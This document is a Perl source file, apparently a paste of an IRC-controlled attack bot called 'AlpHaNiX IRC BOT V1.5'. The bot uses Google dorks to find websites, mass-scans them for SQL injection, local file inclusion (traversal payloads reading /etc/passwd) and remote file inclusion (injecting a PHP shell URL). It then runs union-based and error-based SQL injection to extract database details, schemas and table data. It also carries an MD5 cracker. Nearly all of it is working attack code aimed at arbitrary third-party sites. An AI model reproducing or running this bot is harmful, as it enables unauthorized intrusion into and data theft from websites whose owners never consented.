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May 24th, 2019
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  1. #!/usr/bin/perl
  2. #
  4. # OO O O O O
  7. # O OO O O O O O O O O OOOOOO
  9. ################################################################################################################################
  10. # AlpHaNiX IRC BOT V1.5 beta
  11. ################################################################################################################################
  12. # [+] What's New in this version ?
  13. # 1/ RFI Vulnerable Scanner
  14. # 2/ LFI Vulnerable Scanner
  15. # 3/ an msg when scan finish
  16. # 4/ msg appear once banned from google search
  17. ################################################################################################################################
  18. # [+] About :
  19. ################################################################################################################################
  20. # Language : PERL
  21. # Coder : AlpHaNiX
  22. ################################################################################################################################
  23. # [+] Usage :
  24. ################################################################################################################################
  25. # ------------ You Must Change BOT Config First Of ALL
  26. # ------------ Bot Commands :
  27. #-- !md5 <word> => make an md5 hash
  28. #-- !md5crack <hash> => crack md5 hashes
  29. #-- !base64 <word> => encode with base64
  30. #-- !basedecode <text to decode> => decode base64 text
  31. #-- !lastsploits => to get lastest sploits from milw0rm
  32. #-------------------------------------{ SQL INJECTION FUNCTIONS }-----------------------------------------
  33. #-- !col <vuln> => calculate number of columns in a sql vulnerable
  34. #-- !det <vuln> * => MySQL DB Details (version , user ,db , dir )
  35. #-- !schema <vuln> * => Extract all (DB's , Tables , Columns) names
  36. #-- !dump <vuln> * => Dump Data from a column & table
  37. #-- !ms <vuln> => Get MsSQL DB Details
  38. # ===>>> * you must enter vuln this way,nullarea,2,3
  39. #-------------------------------------{ Vulnerability scan FUNCTIONS }-----------------------------------------
  40. #-- !sqlscan <dork> => fetch url's from google and check if sql vuln or not
  41. #-- !rfiscan <dork> => fetch url's from google and check if rfi vuln or not
  42. #-- !lfiscan <dork> => fetch url's from google and check if lfi vuln or not
  43. ################################################################################################################################
  44. # [+] Contact :
  45. ################################################################################################################################
  46. # E-Mail Address : AlpHa[AT]Hacker[DOT]BZ
  47. # Home Page : http://NullArea.Net
  48. # My Blog : #http://NullArea.Net/blog
  49. ################################################################################################################################
  50. # [+] Greetz :
  51. ################################################################################################################################
  52. # Greetz For My Best Friend Zigma !
  53. # Special Thanks For All of : Djekmani4ever / Unary / DexTeR Corleon / r1z
  54. ################################################################################################################################
  55. # -------------------- Made In Tunisia
  56. ################################################################################################################################
  57. use IO::Socket::INET ;
  58. use LWP::UserAgent;
  59. use LWP::Simple;
  60. use Digest::MD5 qw(md5_hex);
  61. use MIME::Base64;
  62. ############################################################################################
  63. my $server = ""; # IRC Server
  64. my $port = "6667"; # IRC Server port
  65. my $nick = "edo[Scan]"; # Bot Nick
  66. my $channel = "#edoo"; # Channel to Join
  67. my $name = "nix akusapa alpha unr";
  68. my $phpshell = ""; #your phpshell link for RFI scan
  69. ############################################################################################
  70. system('cls');
  71. print "\n\n\n\n OOO OOO OO OO OO\n" ;
  72. print " OO O O O O\n" ;
  73. print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
  74. print " O O O O O O O OOO OO OOOOOO O\n" ;
  75. print " O OO O O O O O O O O OOOOOO\n" ;
  77. print " \n\n AlpHaNiX IRC BOT V1 \n\n";
  78. print "\n [+] Connection To $server ....\n";
  79. ############################################################################################
  80. $connection = IO::Socket::INET->new(PeerAddr=>"$server",
  81. PeerPort=>"$port",
  82. Proto=>'tcp',
  83. Timeout=>'30') or die " [!] Couldnt Connect To $server\n";
  84. print " [+] Connected To $server ....\n\n";
  85. ############################################################################################
  86. print $connection "USER $name\n";
  87. print $connection "NICK $nick\r\n";
  88. ############################################################################################
  89. while($response = <$connection>)
  90. {
  91. print $response; #print IRC Response
  92. if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN $channel\r\n";} #-------Join Channel
  93. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;} #-------Print Help
  94. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5 (.*)$/){&md5encode;} #------- md5encoder
  95. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5crack (.*)$/){&md5cracker;} #-------md5cracker
  96. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!base64 (.*)$/){&base64;} #-------base64 encoder
  97. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!basedecode (.*)$/){&basedecode;}#-------base64decoder
  98. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!iplocation (.*)$/){&iplocation;}#-------ip locator
  99. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lastsploits/){&milw0rm;} #-------last sploits
  100. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!sqlscan (.*)$/){&sqlscan;} #-------SQLi scanner
  101. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lfiscan (.*)$/){&lfiscan;} #-------LFI Scanner
  102. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rfiscan (.*)$/){&rfiscan;} #-------RFI Scanner
  103. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!col (.*)$/){&colcount;} #-------column counter
  104. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!det (.*)$/){&mysqldet;} #-------details grabber
  105. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!schema (.*)$/){&schema;} #-------schema extractor
  106. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!dump (.*)-(.*)-(.*)$/){&mysqldumper}#-------data dumper
  107. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!ms (.*)$/){&mssqldet} #-------mssql details grabber
  108. if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";} #-------ping reponse
  109. }
  110. ############################################################################################
  111. sub help
  112. {
  113. print $connection "PRIVMSG $channel :8,1 AlpHaNiX IRC BOT V1.5 Help : \r\n";
  114. print $connection "PRIVMSG $channel :8,1 \r\n";
  115. print $connection "PRIVMSG $channel :4,1 --------------== Encoding Services ==--------------\r\n";
  116. print $connection "PRIVMSG $channel :9,1 To Generate an MD5 Hash => : 11,1 !md5 word \r\n";
  117. print $connection "PRIVMSG $channel :9,1 To Crack an MD5 Hash => : 11,1 !md5crack Hash \r\n";
  118. print $connection "PRIVMSG $channel :9,1 To Encode with Base64 => : 11,1 !base64 word \r\n";
  119. print $connection "PRIVMSG $channel :9,1 To Decode Base64 => : 11,1 !basedecode base64 \r\n";
  120. print $connection "PRIVMSG $channel :4,1 ----------------== Other Services ==---------------\r\n";
  121. print $connection "PRIVMSG $channel :9,1 Check IP Location => : 11,1 !iplocation ip \r\n";
  122. print $connection "PRIVMSG $channel :9,1 Get lastest Sploits => : 11,1 !lastsploits \r\n";
  123. print $connection "PRIVMSG $channel :4,1 ----------------== SQL Injection ==----------------\r\n";
  124. print $connection "PRIVMSG $channel :9,1 MySQL Column Count => : 11,1 !col target \r\n";
  125. print $connection "PRIVMSG $channel :9,1 MySQL DB Details => : 11,1 !det target \r\n";
  126. print $connection "PRIVMSG $channel :9,1 MySQL Schema Extractor => : 11,1 !schema target \r\n";
  127. print $connection "PRIVMSG $channel :9,1 MySQL Data Dumper => : 11,1 !dump target \r\n";
  128. print $connection "PRIVMSG $channel :9,1 MsSQL Details => : 11,1 !ms target \r\n";
  129. print $connection "PRIVMSG $channel :4,1 ------------== Vulnerablitys Scanner ==------------\r\n";
  130. print $connection "PRIVMSG $channel :9,1 SQL Vuln Scanner => : 11,1 !sqlscan dork \r\n";
  131. print $connection "PRIVMSG $channel :9,1 LFI Vuln Scanner => : 11,1 !lfiscan dork \r\n";
  132. print $connection "PRIVMSG $channel :9,1 RFI Vuln Scanner => : 11,1 !rfiscan dork \r\n";
  133. }
  134. ############################################################################################
  135. sub md5encode
  136. {
  137. my $md5_hash = $3;
  138. my $asker = $1;
  139. my $md5_generated = md5_hex($md5_hash);
  140. print $connection "PRIVMSG $channel :4$asker , done =>6 $md5_generated\r\n";
  141. }
  142. ############################################################################################
  143. sub md5cracker
  144. {
  145. my $asker = $1;
  146. my $hash = $3;
  147. if (length($hash) != 33)
  148. {
  149. print $connection "PRIVMSG $channel :Not Valid MD5 Hash !\r\n";
  150. }
  151. else
  152. {
  153. my $ua = LWP::UserAgent->new();
  154. my $contents = $ua->get(''.$hash);
  155. my $cracked = $contents->content;
  156. if ($cracked)
  157. {
  158. print $connection "PRIVMSG $channel :4$asker Cracked ! =>6 $cracked\r\n";
  159. }
  160. else
  161. {
  162. print $connection "PRIVMSG $channel :4$asker,6 Not Found !\r\n";
  163. }
  164. }
  165. }
  166. ############################################################################################
  167. sub base64
  168. {
  169. my $base64 = $3;
  170. my $asker = $1;
  171. my $base64_encoded = encode_base64($base64);
  172. print $connection "PRIVMSG $channel :4$asker,6 Encoded => $base64_encoded\r\n";
  173. }
  174. ############################################################################################
  175. sub basedecode
  176. {
  177. my $base64d = $3;
  178. my $asker = $1;
  179. my $base64_decoded = decode_base64($base64d);
  180. print $connection "PRIVMSG $channel :4$asker,6 Decoded => $base64_decoded\r\n";
  181. }
  182. ############################################################################################
  183. sub iplocation
  184. {
  185. my $asker = $1;
  186. my $ip = $3;
  187. if (length($ip) > 17)
  188. {
  189. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  190. }
  191. else
  192. {
  193. my $ua = LWP::UserAgent->new();
  194. my $contents = $ua->get(''.$ip);
  195. my $found = $contents->content;
  196. if ($found =~ /<tr><td align="right">Country<\/td><td><b>(.*)<\/b><\/td><\/tr>/)
  197. {
  198. print $connection "PRIVMSG $channel :4$asker , The IP Location =>6 $1\r\n";
  199. }
  200. else
  201. {
  202. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  203. }
  204. }
  205. }
  206. ############################################################################################
  207. sub milw0rm
  208. {
  209. my $rss = get('');
  210. my $xml = XMLin($rss);
  211. my $spl = scalar(@{$xml->{channel}->{item}});
  212. for ($i=0; $i<$spl; $i++)
  213. {
  214. print $connection "PRIVMSG $channel :4\n";
  215. print $connection "PRIVMSG $channel :6Date : $xml->{channel}->{item}->[$i]->{pubDate}\n";
  216. print $connection "PRIVMSG $channel :6Title: $xml->{channel}->{item}->[$i]->{title}\n";
  217. print $connection "PRIVMSG $channel :6Link : $xml->{channel}->{item}->[$i]->{link}\n\n";
  218. }
  219. }
  220. ############################################################################################
  221. sub sqlscan
  222. {
  223. my $asker = $1;
  224. my $dork = $3;
  225. print $connection "PRIVMSG $channel :4$asker 12[+] SQL Vulnerable Scan Started ....\r\n";
  226. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  227. my $google = "$dork&btnG=Search&start=" ;
  228. #----
  229. my $request = HTTP::Request->new(GET=>"$google"."$i");
  230. my $useragent = LWP::UserAgent->new(agent => 'Firefox 3.0.9');
  231. my $response = $useragent->request($request) ;
  232. my $con = $response->content;
  233. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  234. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  235. else
  236. {
  237. for ($i=0;$i<200;$i=$i+10)
  238. {
  239. my $request = HTTP::Request->new(GET=>"$google"."$i");
  240. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  241. my $response = $useragent->request($request) ;
  242. my $con = $response->content;
  243. my $start='class=r><a href=\"';
  244. my $end= '" class=l>';
  245. while ( $con =~ m/$start(.*?)$end/g )
  246. {
  247. my $fl = $1;
  248. my $link = $fl.'0+order+by+9999999--';
  249. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  250. my $ua = LWP::UserAgent->new();
  251. my $req = $ua->get($link);
  252. my $result = $req->content;
  253. if ($result=~ m/You have an error in your SQL syntax/i || $result=~ m/Query failed/i || $result=~ m/SQL query failed/i || $result=~ m/mysql_fetch_/i || $result=~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
  254. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MySQL Vulnerable Website ->6 $fl\r\n";}
  255. elsif ($result=~ m/ODBC SQL Server Driver/i || $result=~ m/Unclosed quotation mark/i || $result=~ m/Microsoft OLE DB Provider for/i )
  256. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MsSQL Vulnerable Website ->6 $fl\r\n";}
  257. elsif ($result=~ m/Microsoft JET Database/i || $result=~ m/ODBC Microsoft Access Driver/i )
  258. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MS Access Vulnerable Website ->6 $fl\r\n";}
  259. }
  260. }
  261. print $connection "PRIVMSG $channel :4$asker 12[!] SQL Scan Finished !\r\n";
  262. }
  263. }
  264. ############################################################################################
  265. sub lfiscan
  266. {
  267. my $asker = $1;
  268. my $dork = $3;
  269. print $connection "PRIVMSG $channel :4$asker 12[+] LFI Vulnerable Scan Started ....\r\n";
  270. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  271. my $google = "$dork&btnG=Search&start=" ;
  272. @LFI = ('../etc/passwd',
  273. '../../etc/passwd',
  274. '../../../etc/passwd',
  275. '../../../../etc/passwd',
  276. '../../../../../etc/passwd',
  277. '../../../../../../etc/passwd',
  278. '../../../../../../../etc/passwd',
  279. '../../../../../../../../etc/passwd',
  280. '../../../../../../../../../etc/passwd',
  281. '../../../../../../../../../../etc/passwd',
  282. '../../../../../../../../../../../etc/passwd',
  283. '../../../../../../../../../../../../etc/passwd',
  284. '../../../../../../../../../../../../../etc/passwd',
  285. '../../../../../../../../../../../../../../etc/passwd',);
  286. my $request = HTTP::Request->new(GET=>"$google"."$i");
  287. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  288. my $response = $useragent->request($request) ;
  289. my $con = $response->content;
  290. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  291. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  292. else
  293. {
  294. for ($i=0;$i<200;$i=$i+10)
  295. {
  296. my $start='class=r><a href=\"';
  297. my $end= '" class=l>';
  298. while ( $con =~ m/$start(.*?)$end/g )
  299. {
  300. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  301. for ($j;$j<=14;$j++)
  302. {
  303. my $fl = $1;
  304. my $link = $fl.$LFI[$j];
  305. my $ua = LWP::UserAgent->new();
  306. my $req = $ua->get($link);
  307. my $result = $req->content;
  308. if ($result=~ m/root:x:/i)
  309. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible LFI Vulnerable Website ->6 $fl\r\n";}
  310. }
  311. }
  312. }
  313. print $connection "PRIVMSG $channel :4$asker 12[!] LFI Scan Finished !\r\n";
  314. }
  315. }
  316. ############################################################################################
  317. sub rfiscan
  318. {
  319. my $asker = $1;
  320. my $dork = $3;
  321. print $connection "PRIVMSG $channel :4$asker 12[+] RFI Vulnerable Scan Started ....\r\n";
  322. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  323. my $google = "$dork&btnG=Search&start=" ;
  324. #----
  325. my $request = HTTP::Request->new(GET=>"$google"."$i");
  326. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  327. my $response = $useragent->request($request) ;
  328. my $con = $response->content;
  329. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  330. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  331. else
  332. {
  333. for ($i=0;$i<200;$i=$i+10)
  334. {
  335. my $start='class=r><a href=\"';
  336. my $end= '" class=l>';
  337. while ( $con =~ m/$start(.*?)$end/g )
  338. {
  339. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  340. my $fl = $1;
  341. my $link = $fl.$phpshell.'??';
  342. my $ua = LWP::UserAgent->new();
  343. my $req = $ua->get($link);
  344. my $result = $req->content;
  345. if ($result=~ m/uid=/i)
  346. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible RFI Vulnerable Website ->6 $fl\r\n";}
  347. }
  348. }
  349. print $connection "PRIVMSG $channel :4$asker 12[!] RFI Scan Finished !\r\n";
  350. }
  351. }
  352. ############################################################################################
  353. sub colcount
  354. {
  355. my $asker = $1;
  356. print $connection "PRIVMSG $channel :4$asker 12[+] Column Counting Started , Please Wait ....\r\n";
  357. my $site = $3 ;
  358. my $null = "09+and+1=" ;
  359. my $code = "0+union+select+" ;
  360. my $add = "+" ;
  361. my $com = "--" ;
  362. my $injection = $site.$null.$code."0",$com ;
  363. my $request = HTTP::Request->new(GET=>$injection);
  364. my $useragent = LWP::UserAgent->new();
  365. my $response = $useragent->request($request);
  366. my $result = $response->content;
  367. if( $result =~ /You have an error in your SQL syntax/ || $result=~/Query failed/ || $result=~/SQL query failed/ || $result=~ /mysql_fetch_/ || $result=~ /mysql_fetch_array/ || $result =~ /mysql_num_rows/ || $result =~ /The used SELECT statements have a different number of columns/)
  368. {
  369. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is Vulnerable\n" ;
  370. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It\n";
  371. }
  372. else
  373. {
  374. print $connection "PRIVMSG $channel :4$asker 10[!] This WebSite Is Not SQL Vulnerable !\n\n";
  375. }
  376. for ($i = 0 ; $i < 50 ; $i ++)
  377. {
  378. $col.=','.$i;
  379. $specialword.=','."0x617a38387069783030713938";
  380. if ($i == 0)
  381. {
  382. $specialword = '' ;
  383. $col = '' ;
  384. }
  385. $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
  386. my $ua = LWP::UserAgent->new();
  387. my $res = $ua->get($sql);
  388. $response=$res->content;
  389. if($response =~ /az88pix00q98/)
  390. {
  391. $i ++;
  392. print $connection "PRIVMSG $channel :4$asker 12[+] This Injection Have6 $i 12Columns\n" ;
  393. }
  394. }
  395. }
  396. ############################################################################################
  397. sub mysqldet
  398. {
  399. my $asker = $1;
  400. my $site = $3 ;
  401. my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938,\@\@datadir,0x617a38387069783030713938)";
  402. print $connection "PRIVMSG $channel :4$asker 12[+] Info Getting, Started Please Wait ....\r\n";
  403. if ($site =~ /(.*)NullArea(.*)/i)
  404. {
  405. $newlink = $1.$selection.$2.'--';
  406. my $ua = LWP::UserAgent->new();
  407. my $request = $ua->get($newlink);
  408. my $content = $request->content;
  409. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  410. {
  411. print $connection "PRIVMSG $channel :4$asker 12[+] Database Version :6 $1\r\n";
  412. print $connection "PRIVMSG $channel :4$asker 12[+] Database Name :6 $2\r\n";
  413. print $connection "PRIVMSG $channel :4$asker 12[+] DB UserName :6 $3\r\n";
  414. print $connection "PRIVMSG $channel :4$asker 12[+] Databse Dir :6 $4\r\n";
  415. }
  416. else
  417. {
  418. print $connection "PRIVMSG $channel :4$asker 12[!] Failed\r\n";
  419. }
  420. }
  421. else
  422. {
  423. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6,2,nullarea,3\r\n";
  424. }
  425. }
  426. ############################################################################################
  427. sub schema
  428. {
  429. my $asker = $1;
  430. my $site = $3 ;
  431. my $selection = "concat(0x617a38387069783030713938,table_name,0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
  432. if ($site =~ /(.*)NullArea(.*)/i)
  433. {
  434. print $connection "PRIVMSG $channel :4$asker 12[+] 6Table 12:|: 6Column 12:|: 6Database\r\n";
  435. for ($i ; $i<=1500 ; $i++ )
  436. {
  437. $newstring = $1.$selection.$2.'+'.'from'.'+'.'information_schema.columns'.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  438. my $ua = LWP::UserAgent->new();
  439. my $request = $ua->get($newstring);
  440. my $content = $request->content;
  441. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  442. {
  443. print $connection "PRIVMSG $channel :4$asker 12[!] 6$1 12:|: 6$2 12:|: 6$3 \r\n";
  444. }
  445. }
  446. }
  447. else
  448. {
  449. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6,2,nullarea,3\r\n";
  450. }
  451. }
  452. ############################################################################################
  453. sub mysqldumper
  454. {
  455. my $asker = $1;
  456. my $site = $3 ;
  457. my $table = $5 ;
  458. my $selection = "concat(0x617a38387069783030713938,$4,0x617a38387069783030713938)";
  459. if ($site =~ /(.*)NullArea(.*)/i)
  460. {
  461. print $connection "PRIVMSG $channel :4$asker 12[+] 6 DATA\r\n";
  462. for ($i ; $i<=1500 ; $i++ )
  463. {
  464. $newstring = $1.$selection.$2.'+'.'from'.'+'.$table.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  465. my $ua = LWP::UserAgent->new();
  466. my $request = $ua->get($newstring);
  467. my $content = $request->content;
  468. if ($content =~ /az88pix00q98(.*)az88pix00q98/)
  469. {
  470. print $connection "PRIVMSG $channel :4$asker 12[!] 6 $1\r\n";
  471. }
  472. }
  473. }
  474. else
  475. {
  476. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6,2,nullarea,3-column_name-table_name\r\n";
  477. }
  478. }
  479. ############################################################################################
  480. sub mssqldet
  481. {
  482. my $asker = $1;
  483. print $connection "PRIVMSG $channel :4$asker 12[+] Getting Infos Started , Please Wait ....\r\n";
  484. my $target = $3 ;
  485. print "\n[+] Working On $target" ;
  486. my $version = 'convert(int,(select+@@version));--' ;
  487. my $system_user = 'convert(int,(select+system_user));--';
  488. my $db_name = 'convert(int,(select+db_name()));--';
  489. my $servername = 'convert(int,(select+@@servername));--' ;
  490. my $hostname = 'convert(int,(select+Host_Name()));--';
  491. my $site = $target ;
  492. my $injection = $site.$version ;
  493. my $request = HTTP::Request->new(GET=>$injection);
  494. my $useragent = LWP::UserAgent->new();
  495. my $response = $useragent->request($request)->as_string ;
  496. if ($response =~ /.*?value\s'/)
  497. {
  498. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is SQL Vulnerable ..\r\n";
  499. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It ..\r\n";
  501. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
  503. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Version Is : 6$ver\r\n";
  505. my $injection = $site.$system_user ;
  506. my $request = HTTP::Request->new(GET=>$injection);
  507. my $useragent = LWP::UserAgent->new();
  508. $useragent->timeout(10);
  509. my $response = $useragent->request($request)->as_string ;
  510. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  511. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL System_User Is : 6$system_user\r\n";
  513. my $injection = $site.$db_name ;
  514. my $request = HTTP::Request->new(GET=>$injection);
  515. my $useragent = LWP::UserAgent->new();
  516. $useragent->timeout(10);
  517. my $response = $useragent->request($request)->as_string ;
  518. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  519. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Database Name Is : 6$db_name\r\n";
  521. my $injection = $site.$servername ;
  522. my $request = HTTP::Request->new(GET=>$injection);
  523. my $useragent = LWP::UserAgent->new();
  524. $useragent->timeout(10);
  525. my $response = $useragent->request($request)->as_string ;
  526. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  527. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Server Name Is : 6$servername\r\n";
  529. my $injection = $site.$hostname;
  530. my $request = HTTP::Request->new(GET=>$injection);
  531. my $useragent = LWP::UserAgent->new();
  532. $useragent->timeout(10);
  533. my $response = $useragent->request($request)->as_string ;
  534. $hostnames = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  535. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL HostName Is : 6$hostnames\r\n";
  536. }
  537. else
  538. {
  539. print $connection "PRIVMSG $channel :4$asker 10[!] This Website Is Not SQL Vulnerable !\r\n";
  540. }
  541. }
  542. ############################################################################################
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